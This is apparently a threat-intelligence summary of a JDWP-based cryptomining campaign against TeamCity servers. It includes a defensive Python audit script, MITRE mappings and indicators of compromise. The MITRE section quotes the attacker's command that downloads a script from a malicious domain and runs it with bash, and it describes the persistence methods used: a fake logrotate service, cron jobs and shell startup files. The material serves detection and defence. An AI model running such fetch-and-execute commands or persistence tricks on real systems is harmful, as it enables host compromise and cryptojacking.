A threat actor exploited exposed Java Debug Wire Protocol (JDWP) interfaces on TeamCity CI/CD servers to deploy a customized, stealthy XMRig cryptominer, achieving rapid remote code execution and establishing multiple persistence mechanisms. The attack involved abusing JDWP’s lack of authentication, using disguised payloads, and employing various persistence techniques including systemd services, cron jobs, and shell scripts. #JDWP #XMRig #TeamCity
Keypoints
- An exposed JDWP interface on TeamCity was abused to perform remote code execution within hours of exposure.
- The attacker deployed a modified XMRig cryptominer with hardcoded configuration designed to evade detection.
- The payload used mining pool proxies to conceal the attacker’s cryptocurrency wallet address.
- JDWP lacks authentication by default, making any exposed instance a critical vulnerability for remote exploitation.
- Persistence was achieved through multiple mechanisms: rc.local scripts, disguised systemd services, shell startup files, and various cron jobs.
- The attack utilized low-level JDWP instructions to execute commands and inject malicious scripts remotely without direct application access.
- Widespread scanning for JDWP endpoints was observed, indicating high attacker interest and frequent targeting.
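To find the exposure the key points describe before a scanner does, here is an added example (not code from the Wiz write-up): a Python audit that reads each JVM's command line and flags JDWP agents listening on a non-loopback address. The function names, the `/proc`-based process collector and the SAMPLE command lines are constructed for this example.

```python
import os
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
# Either spelling of the JDWP agent option that a java command line may carry.
JDWP_RE = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)")

@dataclass
class JdwpFinding:
    pid: int
    address: str   # raw value of the address= sub-option
    exposed: bool  # True when another host could reach the listener
    reason: str

def parse_jdwp(pid: int, cmdline: str) -> Optional[JdwpFinding]:
    """Return a finding if the command line starts a JDWP server, else None."""
    m = JDWP_RE.search(cmdline)
    if not m:
        return None
    opts = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
    if opts.get("server", "n") != "y":
        return None  # client mode: the JVM dials out, nothing is listening
    address = opts.get("address", "")
    host, sep, _port = address.rpartition(":")
    if not sep:  # bare port: all interfaces on JDK 8 and older, loopback only on 9+
        return JdwpFinding(pid, address, True, "bare port; confirm with ss -ltnp")
    if host.strip("[]") in ("localhost", "127.0.0.1", "::1"):
        return JdwpFinding(pid, address, False, "bound to loopback")
    return JdwpFinding(pid, address, True, f"bound to {host}")

def audit(procs: Iterable[Tuple[int, str]]) -> List[JdwpFinding]:
    """Exposed JDWP listeners among (pid, cmdline) pairs."""
    return [f for f in (parse_jdwp(p, c) for p, c in procs) if f and f.exposed]

def linux_procs() -> List[Tuple[int, str]]:
    """(pid, cmdline) for every process in /proc; Linux only, skips vanished pids."""
    out = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            raw = open(f"/proc/{pid}/cmdline", "rb").read()
            out.append((int(pid), raw.replace(b"\0", b" ").decode(errors="replace")))
        except OSError:
            continue
    return out

SAMPLE = [  # constructed command lines (not from the incident) covering each branch
    (101, "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar TeamCity.jar"),
    (102, "java -agentlib:jdwp=transport=dt_socket,server=y,address=localhost:5005 -jar app.jar"),
    (103, "java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar legacy.jar"),
]
```

On a Linux host run `audit(linux_procs())`; `audit(SAMPLE)` exercises the constructed cases and reports only pids 101 and 103. A debug agent found this way belongs on loopback (or removed entirely) on any build server reachable from a network.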
MITRE Techniques
- [T1620] Reflective Code Loading – The attacker injected and executed arbitrary commands remotely via JDWP without restarting the Java application (‘…The attacker used JDWP’s protocol to create strings and invoke Runtime.exec() to download and execute payloads…’).
- [T1059.004] Command and Scripting Interpreter: Unix Shell – The attack utilized shell commands such as curl and bash to deploy scripts (‘…Creating Java strings containing system commands such as: curl -o /tmp/logservice.sh -s https://canonicalconnect.com/logservice.sh; bash /tmp/logservice.sh…’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Script – Persistence was established by adding execution commands to shell startup files like .bashrc and .zshrc (‘…added to user-specific shell config files: .bashrc, .bash_logout, .zshrc…’).
- [T1543.003] Create or Modify System Process: Systemd Service – A fake systemd service named logrotate was created to maintain persistence and disguise the malware (‘…dropped a fake systemd service that disguised itself as logrotate…’).
- [T1053.003] Scheduled Task/Job: Cron – Multiple cron jobs were created in different cron directories to ensure payload re-execution (‘…created cron jobs across multiple locations and time intervals to maintain persistence…’).
- [T1218] Signed Binary Proxy Execution – The logrotate binary was replaced with a modified, malicious XMRig binary to masquerade as a legitimate system utility (‘…malicious payload under the name logrotate to blend in with the legitimate system utility…’).
Indicators of Compromise
- [SHA-1] Malicious scripts and binaries – a923de9df0766d6c4be46191117b8cc6486cf19c (logservice.sh), 1879d5fa0c2ca816fcb261e96338e325e76dca09 (logservice.sh), 18d83ba336ca6926ce8b9d68f104cff053f0c2f9 (o.sh), 815bc1a79440cdc4a7e1d876ff2dc7bc4f53d25e (logrotate variant), and multiple other hashes linked to logrotate and payload binaries.
- [IP Addresses] Command and control and payload servers – 185.196.8.123 (File Server), 185.196.8.86 (Payloads File Server), 176.65.148.57, 176.65.148.86, 176.65.148.239 (JDWP scanners), 185.208.156.247:3333 (Mining Pool), 185.196.8.41 (Mining Pool).
- [Domains] Malicious payload sources – https://awarmcorner.world, https://aheatcorner.world, https://canonicalconnect.com, https://cozy.yachts used for hosting attack payloads.
- [URLs] Payload delivery scripts – https://s3.tebi.io/dhcpdc/o.sh used as an attack script delivery URL.
Read more: https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild